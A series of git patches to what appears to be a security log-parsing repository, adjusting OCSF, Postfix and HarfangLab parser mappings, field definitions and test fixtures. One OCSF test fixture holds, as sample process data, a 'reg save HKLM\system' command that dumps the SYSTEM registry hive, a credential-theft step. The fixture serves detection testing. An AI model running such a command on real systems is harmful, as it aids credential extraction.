-            [{%- for item in parse_event.message.process.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}]
-          process.user.group.name: >
-            [{%- for item in parse_event.message.process.user.groups -%}{%- if item.name -%}'{{item.name}}',{%- endif -%}{%- endfor -%}]
-
+          ocsf.process.user.groups: >
+            [
+              {%- for item in parse_event.message.process.user.groups -%}
+              {
+                {%- if item.uid -%}'uid': '{{item.uid}}',{%- endif -%}
+                {%- if item.name -%}'name': '{{item.name}}',{%- endif -%}
+              },
+              {%- endfor -%}
+            ]
+        filter: "{{parse_event.message.process.user.get('groups') != None}}"
       - set:
           process.user.name: "{{ parse_event.message.process.user.name }}"
           process.parent.command_line: "{{ parse_event.message.process.parent_process.cmd_line }}"
           process.parent.end: "{{ parse_event.message.process.parent_process.terminated_time | to_rfc3339 }}"
       - set:
-          process.parent.group.id:
-            - "{{ parse_event.message.process.parent_process.egid }}"
+          ocsf.process.parent.group: >
+            {
+              'id': '{{ parse_event.message.process.parent_process.egid }}',
+              'name': '{{ parse_event.message.process.parent_process.group.name }}'
+            }
         filter: "{{ parse_event.message.process.parent_process.get('egid') != None }}"
       - set:
-          process.parent.group.id:
-            - "{{ parse_event.message.process.parent_process.group.uid }}"
+          ocsf.process.parent.group: >
+            {
+              'id': '{{ parse_event.message.process.parent_process.group.uid }}',
+              'name': '{{ parse_event.message.process.parent_process.group.name }}'
+            }
         filter: "{{ parse_event.message.process.parent_process.group.get('uid') != None }}"
       - set:
-          process.parent.group.name: "{{ parse_event.message.process.parent_process.group.name }}"
           process.parent.name: "{{ parse_event.message.process.parent_process.name }}"
           process.parent.pid: "{{ parse_event.message.process.parent_process.pid }}"
           process.parent.start: "{{ parse_event.message.process.parent_process.created_time | to_rfc3339 }}"
@@ -666,10 +701,16 @@ stages:
       - set:
           process.parent.user.name: "{{ parse_event.message.process.parent_process.user.name }}"
       - set:
-          process.parent.user.group.id: >
-            [{%- for item in parse_event.message.process.parent_process.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}]
-          process.parent.user.group.name: >
-            [{%- for item in parse_event.message.process.parent_process.user.groups -%}{%- if item.name -%}'{{item.name}}',{%- endif -%}{%- endfor -%}]
+          ocsf.process.parent.user.groups: >
+            [
+              {%- for item in parse_event.message.process.parent_process.user.groups -%}
+              {
+                {%- if item.uid -%}'uid': '{{item.uid}}',{%- endif -%}
+                {%- if item.name -%}'name': '{{item.name}}',{%- endif -%}
+              },
+              {%- endfor -%}
+            ]
+        filter: "{{parse_event.message.process.parent_process.user.get('groups') != None}}"
 
   pipeline_object_proxy:
     actions: []
diff --git a/OCSF/ocsf/tests/test_process_activity_1.json b/OCSF/ocsf/tests/test_process_activity_1.json
index a3ec8acfe..418f30560 100644
--- a/OCSF/ocsf/tests/test_process_activity_1.json
+++ b/OCSF/ocsf/tests/test_process_activity_1.json
@@ -44,10 +44,6 @@
       "command_line": "reg  save HKLM\\system C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\system ",
       "pid": 4696,
       "user": {
-        "group": {
-          "id": [],
-          "name": []
-        },
         "id": [
           "NULL SID"
         ]

From 66cca3dea4a29461f0db1db70a7e38c04455632d Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Tue, 17 Sep 2024 18:38:05 +0200
Subject: [PATCH 051/317] fix(OCSF): apply linter

---
 OCSF/ocsf/_meta/fields.yml | 20 ++++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)

diff --git a/OCSF/ocsf/_meta/fields.yml b/OCSF/ocsf/_meta/fields.yml
index 532291fd9..cf1b560dd 100644
--- a/OCSF/ocsf/_meta/fields.yml
+++ b/OCSF/ocsf/_meta/fields.yml
@@ -20,16 +20,6 @@ ocsf.class_uid:
   name: ocsf.class_uid
   type: long
 
-ocsf.user.groups:
-  description: The list of groups that the user belong to
-  name: ocsf.user.groups
-  type: array
-
-ocsf.vulnerabilities:
-  description: ''
-  name: ocsf.vulnerabilities
-  type: array
-
 ocsf.process.group:
   description: ''
   name: ocsf.process.group
@@ -79,3 +69,13 @@ ocsf.process.user.groups:
   description: ''
   name: ocsf.process.user.groups
   type: array
+
+ocsf.user.groups:
+  description: The list of groups that the user belong to
+  name: ocsf.user.groups
+  type: array
+
+ocsf.vulnerabilities:
+  description: ''
+  name: ocsf.vulnerabilities
+  type: array

From 23c2cea3bf883a9754241a2ee22c2478f841575a Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Wed, 18 Sep 2024 10:09:36 +0200
Subject: [PATCH 052/317] new CHANGELOG file

---
 GateWatcher/aioniq_ecs/CHANGELOG.md | 7 +++++++
 1 file changed, 7 insertions(+)
 create mode 100644 GateWatcher/aioniq_ecs/CHANGELOG.md

diff --git a/GateWatcher/aioniq_ecs/CHANGELOG.md b/GateWatcher/aioniq_ecs/CHANGELOG.md
new file mode 100644
index 000000000..66b10dc08
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/CHANGELOG.md
@@ -0,0 +1,7 @@
+# Gatewatcher ECS parser for sekoia
+
+This format parse ECS logs exported from the GCenter (version v103+).
+
+# Versions
+
+- 1.0.0: initial release

From 5d874082b94985df51dc17b1c14e7f1dd844a03e Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <135212489+lvoloshyn-sekoia@users.noreply.github.com>
Date: Wed, 18 Sep 2024 12:42:28 +0300
Subject: [PATCH 053/317] Update 1Password/1password-epm/_meta/manifest.yml
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-authored-by: Sébastien Quioc <sebastien.quioc@sekoia.fr>
---
 1Password/1password-epm/_meta/manifest.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/1Password/1password-epm/_meta/manifest.yml b/1Password/1password-epm/_meta/manifest.yml
index f2f07105a..0ea782184 100644
--- a/1Password/1password-epm/_meta/manifest.yml
+++ b/1Password/1password-epm/_meta/manifest.yml
@@ -1,5 +1,5 @@
 uuid: 09754cc4-e247-4712-9a76-25529ba11b8b
-name: 1Password EPM
+name: 1Password EPM [BETA]
 slug: one-password-epm
 automation_connector_uuid: f3330ea4-e492-4c57-9764-d2dcf1d044eb
 automation_module_uuid: 56f9e1f6-95ba-45ed-867b-44fb3183934d

From 66920f4a27c2915ef7c87a5b556162c48873869c Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 18 Sep 2024 14:17:04 +0200
Subject: [PATCH 054/317] fix(Postfix): handle when log.syslog.appname is empty
 or equals to the dash

---
 Postfix/postfix/ingest/parser.yml | 4 ++--
 Postfix/postfix/tests/local5.json | 4 ++--
 Postfix/postfix/tests/smtp3.json  | 4 ++--
 3 files changed, 6 insertions(+), 6 deletions(-)

diff --git a/Postfix/postfix/ingest/parser.yml b/Postfix/postfix/ingest/parser.yml
index 0bd42a44a..e2982cf2b 100644
--- a/Postfix/postfix/ingest/parser.yml
+++ b/Postfix/postfix/ingest/parser.yml
@@ -7,7 +7,7 @@ pipeline:
       properties:
         input_field: "{{original.message}}"
         output_field: message
-        pattern_key: "{{original.get('log', {}).get('syslog', {}).get('appname', 'default')}}"
+        pattern_key: "{{original.get('log', {}).get('syslog', {}).get('appname') or '-'}}"
         patterns:
           "postfix/smtp": "%{POSTFIX_SMTP}"
           "postfix/smtpd": "%{CASE_POSTFIX_SMTPD}"
@@ -27,7 +27,7 @@ pipeline:
           "postfix/anvil": "%{POSTFIX_ANVIL}"
           "postfix/pickup": "%{POSTFIX_PICKUP}"
           "postfix": "%{POSTFIX}"
-          "default": "%{POSTFIX_POSTGREY}|%{POSTFIX}|%{SPAMD}|%{POSTFIX_POLCY_SPF}|%{POSTFIX_CLEANUP}|%{POSTFIX_QMGR}|%{POSTFIX_SMTPD}"
+          "-": "%{POSTFIX_POSTGREY}|%{POSTFIX}|%{SPAMD}|%{POSTFIX_POLCY_SPF}|%{POSTFIX_CLEANUP}|%{POSTFIX_QMGR}|%{POSTFIX_SMTPD}"
 
         custom_patterns:
           CASE_POSTFIX_LOCAL: "%{POSTFIX_SMTP_RELAY}|%{POSTFIX_KEYVALUE}|%{POSTFIX_WARNING}"
diff --git a/Postfix/postfix/tests/local5.json b/Postfix/postfix/tests/local5.json
index 664aebf05..047459b1a 100644
--- a/Postfix/postfix/tests/local5.json
+++ b/Postfix/postfix/tests/local5.json
@@ -3,7 +3,7 @@
     "message": "B84078B26C7: to=proxy@example.localdomain, orig_to=sample.orig.to, relay=local, delay=0.05, delays=0.04/0.02/0/0, dsn=2.0.0, status=sent (delivered to mailbox)",
     "log": {
       "syslog": {
-        "appname": "postfix/local"
+        "appname": ""
       }
     }
   },
@@ -37,7 +37,7 @@
     },
     "log": {
       "syslog": {
-        "appname": "postfix/local"
+        "appname": ""
       }
     },
     "network": {
diff --git a/Postfix/postfix/tests/smtp3.json b/Postfix/postfix/tests/smtp3.json
index d6cc4267e..24f51985b 100644
--- a/Postfix/postfix/tests/smtp3.json
+++ b/Postfix/postfix/tests/smtp3.json
@@ -3,7 +3,7 @@
     "message": "7B3643F820: to=<jdoe@example.org>, relay=127.0.0.1[127.0.0.1]:10025, delay=0.08, delays=0.03/0/0.01/0.05, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 837B35FD17)",
     "log": {
       "syslog": {
-        "appname": "postfix/smtp"
+        "appname": "-"
       }
     }
   },
@@ -39,7 +39,7 @@
     },
     "log": {
       "syslog": {
-        "appname": "postfix/smtp"
+        "appname": "-"
       }
     },
     "network": {

From ba0223ec41286874321b03d1a084fb1b2c3caedd Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 18 Sep 2024 15:41:48 +0200
Subject: [PATCH 055/317] fix(Harfanglab): declare the action.properties.*
 fields to set

---
 HarfangLab/harfanglab/_meta/fields.yml        | 868 +++++++++++++++++-
 HarfangLab/harfanglab/ingest/parser.yml       | 178 +++-
 HarfangLab/harfanglab/tests/test_bug.json     |   4 -
 .../harfanglab/tests/wineeventlog-event.json  |  11 +-
 HarfangLab/harfanglab/tests/wineventlog2.json |   9 +-
 HarfangLab/harfanglab/tests/wineventlog3.json |  69 +-
 HarfangLab/harfanglab/tests/wineventlog4.json |   2 -
 7 files changed, 1070 insertions(+), 71 deletions(-)

diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml
index fe23cec7b..aded5e2de 100644
--- a/HarfangLab/harfanglab/_meta/fields.yml
+++ b/HarfangLab/harfanglab/_meta/fields.yml
@@ -1,12 +1,506 @@
-action.properties:
-  description: 'A detailed set of attributes associated with a specific action, typically
-    involving user authentication or a network event. It contains the following keys:'
-  name: action.properties
-  type: object
+action.properties.ASsecurityintelligencecreationtime:
+  description: ''
+  name: action.properties.ASsecurityintelligencecreationtime
+  type: keyword
+
+action.properties.ASsecurityintelligenceversion:
+  description: ''
+  name: action.properties.ASsecurityintelligenceversion
+  type: keyword
+
+action.properties.AVsecurityintelligencecreationtime:
+  description: ''
+  name: action.properties.AVsecurityintelligencecreationtime
+  type: keyword
+
+action.properties.AVsecurityintelligenceversion:
+  description: ''
+  name: action.properties.AVsecurityintelligenceversion
+  type: keyword
+
+action.properties.AccessList:
+  description: ''
+  name: action.properties.AccessList
+  type: keyword
+
+action.properties.AccessMask:
+  description: ''
+  name: action.properties.AccessMask
+  type: keyword
+
+action.properties.AccessReason:
+  description: ''
+  name: action.properties.AccessReason
+  type: keyword
+
+action.properties.ActionID:
+  description: ''
+  name: action.properties.ActionID
+  type: keyword
+
+action.properties.ActionName:
+  description: ''
+  name: action.properties.ActionName
+  type: keyword
+
+action.properties.AdditionalActionsID:
+  description: ''
+  name: action.properties.AdditionalActionsID
+  type: keyword
+
+action.properties.AdditionalActionsString:
+  description: ''
+  name: action.properties.AdditionalActionsString
+  type: keyword
+
+action.properties.AuthenticationPackageName:
+  description: ''
+  name: action.properties.AuthenticationPackageName
+  type: keyword
+
+action.properties.BMstate:
+  description: ''
+  name: action.properties.BMstate
+  type: keyword
+
+action.properties.CacheState:
+  description: ''
+  name: action.properties.CacheState
+  type: keyword
+
+action.properties.CallerProcessId:
+  description: ''
+  name: action.properties.CallerProcessId
+  type: keyword
+
+action.properties.CallerProcessName:
+  description: ''
+  name: action.properties.CallerProcessName
+  type: keyword
+
+action.properties.CategoryID:
+  description: ''
+  name: action.properties.CategoryID
+  type: keyword
+
+action.properties.CategoryName:
+  description: ''
+  name: action.properties.CategoryName
+  type: keyword
+
+action.properties.ClientProcessId:
+  description: ''
+  name: action.properties.ClientProcessId
+  type: keyword
+
+action.properties.ClientProcessStartKey:
+  description: ''
+  name: action.properties.ClientProcessStartKey
+  type: keyword
+
+action.properties.DetectionID:
+  description: ''
+  name: action.properties.DetectionID
+  type: keyword
+
+action.properties.DetectionTime:
+  description: ''
+  name: action.properties.DetectionTime
+  type: keyword
+
+action.properties.DetectionUser:
+  description: ''
+  name: action.properties.DetectionUser
+  type: keyword
+
+action.properties.ElevatedToken:
+  description: ''
+  name: action.properties.ElevatedToken
+  type: keyword
+
+action.properties.EngineVersion:
+  description: ''
+  name: action.properties.EngineVersion
+  type: keyword
+
+action.properties.Engineup-to-date:
+  description: ''
+  name: action.properties.Engineup-to-date
+  type: keyword
+
+action.properties.Engineversion:
+  description: ''
+  name: action.properties.Engineversion
+  type: keyword
+
+action.properties.ErrorCode:
+  description: ''
+  name: action.properties.ErrorCode
+  type: keyword
+
+action.properties.ErrorDescription:
+  description: ''
+  name: action.properties.ErrorDescription
+  type: keyword
+
+action.properties.ExecutionID:
+  description: ''
+  name: action.properties.ExecutionID
+  type: keyword
+
+action.properties.ExecutionName:
+  description: ''
+  name: action.properties.ExecutionName
+  type: keyword
+
+action.properties.FQDN:
+  description: ''
+  name: action.properties.FQDN
+  type: keyword
+
+action.properties.FWLink:
+  description: ''
+  name: action.properties.FWLink
+  type: keyword
+
+action.properties.FailureReason:
+  description: ''
+  name: action.properties.FailureReason
+  type: keyword
+
+action.properties.FileNameBuffer:
+  description: ''
+  name: action.properties.FileNameBuffer
+  type: keyword
+
+action.properties.FileNameLength:
+  description: ''
+  name: action.properties.FileNameLength
+  type: keyword
+
+action.properties.Flags:
+  description: ''
+  name: action.properties.Flags
+  type: keyword
+
+action.properties.Hash:
+  description: ''
+  name: action.properties.Hash
+  type: keyword
+
+action.properties.HashSize:
+  description: ''
+  name: action.properties.HashSize
+  type: keyword
+
+action.properties.IOAVstate:
+  description: ''
+  name: action.properties.IOAVstate
+  type: keyword
+
+action.properties.ImpersonationLevel:
+  description: ''
+  name: action.properties.ImpersonationLevel
+  type: keyword
+
+action.properties.IpAddress:
+  description: ''
+  name: action.properties.IpAddress
+  type: keyword
+
+action.properties.IpPort:
+  description: ''
+  name: action.properties.IpPort
+  type: keyword
+
+action.properties.IssuerName:
+  description: ''
+  name: action.properties.IssuerName
+  type: keyword
+
+action.properties.IssuerNameLength:
+  description: ''
+  name: action.properties.IssuerNameLength
+  type: keyword
+
+action.properties.IssuerTBSHash:
+  description: ''
+  name: action.properties.IssuerTBSHash
+  type: keyword
+
+action.properties.IssuerTBSHashSize:
+  description: ''
+  name: action.properties.IssuerTBSHashSize
+  type: keyword
+
+action.properties.KeyLength:
+  description: ''
+  name: action.properties.KeyLength
+  type: keyword
+
+action.properties.LastASsecurityintelligenceage:
+  description: ''
+  name: action.properties.LastASsecurityintelligenceage
+  type: keyword
+
+action.properties.LastAVsecurityintelligenceage:
+  description: ''
+  name: action.properties.LastAVsecurityintelligenceage
+  type: keyword
+
+action.properties.Lastfullscanage:
+  description: ''
+  name: action.properties.Lastfullscanage
+  type: keyword
+
+action.properties.Lastfullscanendtime:
+  description: ''
+  name: action.properties.Lastfullscanendtime
+  type: keyword
+
+action.properties.Lastfullscansource:
+  description: ''
+  name: action.properties.Lastfullscansource
+  type: keyword
+
+action.properties.Lastfullscanstarttime:
+  description: ''
+  name: action.properties.Lastfullscanstarttime
+  type: keyword
+
+action.properties.Lastquickscanage:
+  description: ''
+  name: action.properties.Lastquickscanage
+  type: keyword
+
+action.properties.Lastquickscanendtime:
+  description: ''
+  name: action.properties.Lastquickscanendtime
+  type: keyword
+
+action.properties.Lastquickscansource:
+  description: ''
+  name: action.properties.Lastquickscansource
+  type: keyword
+
+action.properties.Lastquickscanstarttime:
+  description: ''
+  name: action.properties.Lastquickscanstarttime
+  type: keyword
+
+action.properties.Latestengineversion:
+  description: ''
+  name: action.properties.Latestengineversion
+  type: keyword
+
+action.properties.Latestplatformversion:
+  description: ''
+  name: action.properties.Latestplatformversion
+  type: keyword
+
+action.properties.LmPackageName:
+  description: ''
+  name: action.properties.LmPackageName
+  type: keyword
+
+action.properties.LogonGuid:
+  description: ''
+  name: action.properties.LogonGuid
+  type: keyword
+
+action.properties.LogonProcessName:
+  description: ''
+  name: action.properties.LogonProcessName
+  type: keyword
+
+action.properties.LogonType:
+  description: ''
+  name: action.properties.LogonType
+  type: keyword
+
+action.properties.NRIengineversion:
+  description: ''
+  name: action.properties.NRIengineversion
+  type: keyword
+
+action.properties.NRIsecurityintelligenceversion:
+  description: ''
+  name: action.properties.NRIsecurityintelligenceversion
+  type: keyword
+
+action.properties.NotValidAfter:
+  description: ''
+  name: action.properties.NotValidAfter
+  type: keyword
+
+action.properties.NotValidBefore:
+  description: ''
+  name: action.properties.NotValidBefore
+  type: keyword
+
+action.properties.OAstate:
+  description: ''
+  name: action.properties.OAstate
+  type: keyword
+
+action.properties.ObjectType:
+  description: ''
+  name: action.properties.ObjectType
+  type: keyword
+
+action.properties.OriginID:
+  description: ''
+  name: action.properties.OriginID
+  type: keyword
+
+action.properties.OriginName:
+  description: ''
+  name: action.properties.OriginName
+  type: keyword
+
+action.properties.PageHash:
+  description: ''
+  name: action.properties.PageHash
+  type: keyword
+
+action.properties.ParentProcessId:
+  description: ''
+  name: action.properties.ParentProcessId
+  type: keyword
+
+action.properties.Path:
+  description: ''
+  name: action.properties.Path
+  type: keyword
+
+action.properties.Platformup-to-date:
+  description: ''
+  name: action.properties.Platformup-to-date
+  type: keyword
+
+action.properties.Platformversion:
+  description: ''
+  name: action.properties.Platformversion
+  type: keyword
+
+action.properties.PolicyBits:
+  description: ''
+  name: action.properties.PolicyBits
+  type: keyword
+
+action.properties.PostCleanStatus:
+  description: ''
+  name: action.properties.PostCleanStatus
+  type: keyword
+
+action.properties.PreExecutionStatus:
+  description: ''
+  name: action.properties.PreExecutionStatus
+  type: keyword
+
+action.properties.ProcessId:
+  description: ''
+  name: action.properties.ProcessId
+  type: keyword
+
+action.properties.ProcessName:
+  description: ''
+  name: action.properties.ProcessName
+  type: keyword
+
+action.properties.ProcessNameBuffer:
+  description: ''
+  name: action.properties.ProcessNameBuffer
+  type: keyword
+
+action.properties.ProcessNameLength:
+  description: ''
+  name: action.properties.ProcessNameLength
+  type: keyword
+
+action.properties.ProductName:
+  description: ''
+  name: action.properties.ProductName
+  type: keyword
+
+action.properties.ProductVersion:
+  description: ''
+  name: action.properties.ProductVersion
+  type: keyword
+
+action.properties.Productstatus:
+  description: ''
+  name: action.properties.Productstatus
+  type: keyword
+
+action.properties.ProfileChanged:
+  description: ''
+  name: action.properties.ProfileChanged
+  type: keyword
 
-action.properties.Path:
+action.properties.PublisherName:
   description: ''
-  name: action.properties.Path
+  name: action.properties.PublisherName
+  type: keyword
+
+action.properties.PublisherNameLength:
+  description: ''
+  name: action.properties.PublisherNameLength
+  type: keyword
+
+action.properties.PublisherTBSHash:
+  description: ''
+  name: action.properties.PublisherTBSHash
+  type: keyword
+
+action.properties.PublisherTBSHashSize:
+  description: ''
+  name: action.properties.PublisherTBSHashSize
+  type: keyword
+
+action.properties.RTPstate:
+  description: ''
+  name: action.properties.RTPstate
+  type: keyword
+
+action.properties.RelativeTargetName:
+  description: ''
+  name: action.properties.RelativeTargetName
+  type: keyword
+
+action.properties.RemediationUser:
+  description: ''
+  name: action.properties.RemediationUser
+  type: keyword
+
+action.properties.RequestedPolicy:
+  description: ''
+  name: action.properties.RequestedPolicy
+  type: keyword
+
+action.properties.RequestedSigningLevel:
+  description: ''
+  name: action.properties.RequestedSigningLevel
+  type: keyword
+
+action.properties.RestrictedAdminMode:
+  description: ''
+  name: action.properties.RestrictedAdminMode
+  type: keyword
+
+action.properties.RpcCallClientLocality:
+  description: ''
+  name: action.properties.RpcCallClientLocality
+  type: keyword
+
+action.properties.RuleId:
+  description: ''
+  name: action.properties.RuleId
+  type: keyword
+
+action.properties.RuleName:
+  description: ''
+  name: action.properties.RuleName
   type: keyword
 
 action.properties.ScriptBlockText:
@@ -14,6 +508,161 @@ action.properties.ScriptBlockText:
   name: action.properties.ScriptBlockText
   type: keyword
 
+action.properties.SecureRequired:
+  description: ''
+  name: action.properties.SecureRequired
+  type: keyword
+
+action.properties.SecurityintelligenceVersion:
+  description: ''
+  name: action.properties.SecurityintelligenceVersion
+  type: keyword
+
+action.properties.SeverityID:
+  description: ''
+  name: action.properties.SeverityID
+  type: keyword
+
+action.properties.SeverityName:
+  description: ''
+  name: action.properties.SeverityName
+  type: keyword
+
+action.properties.ShareLocalPath:
+  description: ''
+  name: action.properties.ShareLocalPath
+  type: keyword
+
+action.properties.ShareName:
+  description: ''
+  name: action.properties.ShareName
+  type: keyword
+
+action.properties.Signature:
+  description: ''
+  name: action.properties.Signature
+  type: keyword
+
+action.properties.SignatureType:
+  description: ''
+  name: action.properties.SignatureType
+  type: keyword
+
+action.properties.SourceID:
+  description: ''
+  name: action.properties.SourceID
+  type: keyword
+
+action.properties.SourceName:
+  description: ''
+  name: action.properties.SourceName
+  type: keyword
+
+action.properties.State:
+  description: ''
+  name: action.properties.State
+  type: keyword
+
+action.properties.Status:
+  description: ''
+  name: action.properties.Status
+  type: keyword
+
+action.properties.StatusCode:
+  description: ''
+  name: action.properties.StatusCode
+  type: keyword
+
+action.properties.StatusDescription:
+  description: ''
+  name: action.properties.StatusDescription
+  type: keyword
+
+action.properties.SubStatus:
+  description: ''
+  name: action.properties.SubStatus
+  type: keyword
+
+action.properties.SubjectDomainName:
+  description: ''
+  name: action.properties.SubjectDomainName
+  type: keyword
+
+action.properties.SubjectLogonId:
+  description: ''
+  name: action.properties.SubjectLogonId
+  type: keyword
+
+action.properties.SubjectUserName:
+  description: ''
+  name: action.properties.SubjectUserName
+  type: keyword
+
+action.properties.SubjectUserSid:
+  description: ''
+  name: action.properties.SubjectUserSid
+  type: keyword
+
+action.properties.TargetDomainName:
+  description: ''
+  name: action.properties.TargetDomainName
+  type: keyword
+
+action.properties.TargetInfo:
+  description: ''
+  name: action.properties.TargetInfo
+  type: keyword
+
+action.properties.TargetLinkedLogonId:
+  description: ''
+  name: action.properties.TargetLinkedLogonId
+  type: keyword
+
+action.properties.TargetLogonGuid:
+  description: ''
+  name: action.properties.TargetLogonGuid
+  type: keyword
+
+action.properties.TargetLogonId:
+  description: ''
+  name: action.properties.TargetLogonId
+  type: keyword
+
+action.properties.TargetOutboundDomainName:
+  description: ''
+  name: action.properties.TargetOutboundDomainName
+  type: keyword
+
+action.properties.TargetOutboundUserName:
+  description: ''
+  name: action.properties.TargetOutboundUserName
+  type: keyword
+
+action.properties.TargetServerName:
+  description: ''
+  name: action.properties.TargetServerName
+  type: keyword
+
+action.properties.TargetSid:
+  description: ''
+  name: action.properties.TargetSid
+  type: keyword
+
+action.properties.TargetUserName:
+  description: ''
+  name: action.properties.TargetUserName
+  type: keyword
+
+action.properties.TargetUserSid:
+  description: ''
+  name: action.properties.TargetUserSid
+  type: keyword
+
+action.properties.TaskContent:
+  description: ''
+  name: action.properties.TaskContent
+  type: keyword
+
 action.properties.TaskContentNew_Args:
   description: ''
   name: action.properties.TaskContentNew_Args
@@ -24,6 +673,211 @@ action.properties.TaskContentNew_Command:
   name: action.properties.TaskContentNew_Command
   type: keyword
 
+action.properties.TaskName:
+  description: ''
+  name: action.properties.TaskName
+  type: keyword
+
+action.properties.ThreatID:
+  description: ''
+  name: action.properties.ThreatID
+  type: keyword
+
+action.properties.ThreatName:
+  description: ''
+  name: action.properties.ThreatName
+  type: keyword
+
+action.properties.TotalSignatureCount:
+  description: ''
+  name: action.properties.TotalSignatureCount
+  type: keyword
+
+action.properties.TransmittedServices:
+  description: ''
+  name: action.properties.TransmittedServices
+  type: keyword
+
+action.properties.TypeID:
+  description: ''
+  name: action.properties.TypeID
+  type: keyword
+
+action.properties.TypeName:
+  description: ''
+  name: action.properties.TypeName
+  type: keyword
+
+action.properties.Unused:
+  description: ''
+  name: action.properties.Unused
+  type: keyword
+
+action.properties.Unused2:
+  description: ''
+  name: action.properties.Unused2
+  type: keyword
+
+action.properties.Unused3:
+  description: ''
+  name: action.properties.Unused3
+  type: keyword
+
+action.properties.Unused4:
+  description: ''
+  name: action.properties.Unused4
+  type: keyword
+
+action.properties.Unused5:
+  description: ''
+  name: action.properties.Unused5
+  type: keyword
+
+action.properties.Unused6:
+  description: ''
+  name: action.properties.Unused6
+  type: keyword
+
+action.properties.ValidatedPolicy:
+  description: ''
+  name: action.properties.ValidatedPolicy
+  type: keyword
+
+action.properties.ValidatedSigningLevel:
+  description: ''
+  name: action.properties.ValidatedSigningLevel
+  type: keyword
+
+action.properties.VerificationError:
+  description: ''
+  name: action.properties.VerificationError
+  type: keyword
+
+action.properties.VirtualAccount:
+  description: ''
+  name: action.properties.VirtualAccount
+  type: keyword
+
+action.properties.WorkstationName:
+  description: ''
+  name: action.properties.WorkstationName
+  type: keyword
+
+action.properties.param0:
+  description: ''
+  name: action.properties.param0
+  type: keyword
+
+action.properties.param1:
+  description: ''
+  name: action.properties.param1
+  type: keyword
+
+action.properties.param10:
+  description: ''
+  name: action.properties.param10
+  type: keyword
+
+action.properties.param11:
+  description: ''
+  name: action.properties.param11
+  type: keyword
+
+action.properties.param12:
+  description: ''
+  name: action.properties.param12
+  type: keyword
+
+action.properties.param13:
+  description: ''
+  name: action.properties.param13
+  type: keyword
+
+action.properties.param14:
+  description: ''
+  name: action.properties.param14
+  type: keyword
+
+action.properties.param15:
+  description: ''
+  name: action.properties.param15
+  type: keyword
+
+action.properties.param16:
+  description: ''
+  name: action.properties.param16
+  type: keyword
+
+action.properties.param17:
+  description: ''
+  name: action.properties.param17
+  type: keyword
+
+action.properties.param18:
+  description: ''
+  name: action.properties.param18
+  type: keyword
+
+action.properties.param19:
+  description: ''
+  name: action.properties.param19
+  type: keyword
+
+action.properties.param2:
+  description: ''
+  name: action.properties.param2
+  type: keyword
+
+action.properties.param20:
+  description: ''
+  name: action.properties.param20
+  type: keyword
+
+action.properties.param21:
+  description: ''
+  name: action.properties.param21
+  type: keyword
+
+action.properties.param22:
+  description: ''
+  name: action.properties.param22
+  type: keyword
+
+action.properties.param3:
+  description: ''
+  name: action.properties.param3
+  type: keyword
+
+action.properties.param4:
+  description: ''
+  name: action.properties.param4
+  type: keyword
+
+action.properties.param5:
+  description: ''
+  name: action.properties.param5
+  type: keyword
+
+action.properties.param6:
+  description: ''
+  name: action.properties.param6
+  type: keyword
+
+action.properties.param7:
+  description: ''
+  name: action.properties.param7
+  type: keyword
+
+action.properties.param8:
+  description: ''
+  name: action.properties.param8
+  type: keyword
+
+action.properties.param9:
+  description: ''
+  name: action.properties.param9
+  type: keyword
+
 harfanglab.aggregation_key:
   description: The key to the events aggregation
   name: harfanglab.aggregation_key
diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 7a3ceda3e..1ae78875b 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -268,13 +268,189 @@ stages:
           event.type: ["info"]
           event.provider: "{{json_event.message.source_name}}"
           event.code: "{{json_event.message.event_id|string}}"
-          action.properties: "{{json_event.message.event_data}}"
           source.ip: "{{json_event.message.event_data.IpAddress}}"
           action.id: "{{json_event.message.event_id}}"
           user.name: "{{json_event.message.event_data.SubjectUserName}}"
           user.domain: "{{json_event.message.event_data.SubjectDomainName}}"
           user.target.name: "{{json_event.message.event_data.TargetUserName}}"
           user.target.domain: "{{json_event.message.event_data.TargetDomainName}}"
+          action.properties.ASsecurityintelligencecreationtime: "{{json_event.message.event_data.get('AS security intelligence creation time')}}"
+          action.properties.ASsecurityintelligenceversion: "{{json_event.message.event_data.get('AS security intelligence version')}}"
+          action.properties.AVsecurityintelligencecreationtime: "{{json_event.message.event_data.get('AV security intelligence creation time')}}"
+          action.properties.AVsecurityintelligenceversion: "{{json_event.message.event_data.get('AV security intelligence version')}}"
+          action.properties.AccessList: "{{json_event.message.event_data.get('AccessList')}}"
+          action.properties.AccessMask: "{{json_event.message.event_data.get('AccessMask')}}"
+          action.properties.AccessReason: "{{json_event.message.event_data.get('AccessReason')}}"
+          action.properties.ActionID: "{{json_event.message.event_data.get('Action ID')}}"
+          action.properties.ActionName: "{{json_event.message.event_data.get('Action Name')}}"
+          action.properties.AdditionalActionsID: "{{json_event.message.event_data.get('Additional Actions ID')}}"
+          action.properties.AdditionalActionsString: "{{json_event.message.event_data.get('Additional Actions String')}}"
+          action.properties.AuthenticationPackageName: "{{json_event.message.event_data.get('AuthenticationPackageName')}}"
+          action.properties.BMstate: "{{json_event.message.event_data.get('BM state')}}"
+          action.properties.CacheState: "{{json_event.message.event_data.get('CacheState')}}"
+          action.properties.CallerProcessId: "{{json_event.message.event_data.get('CallerProcessId')}}"
+          action.properties.CallerProcessName: "{{json_event.message.event_data.get('CallerProcessName')}}"
+          action.properties.CategoryID: "{{json_event.message.event_data.get('Category ID')}}"
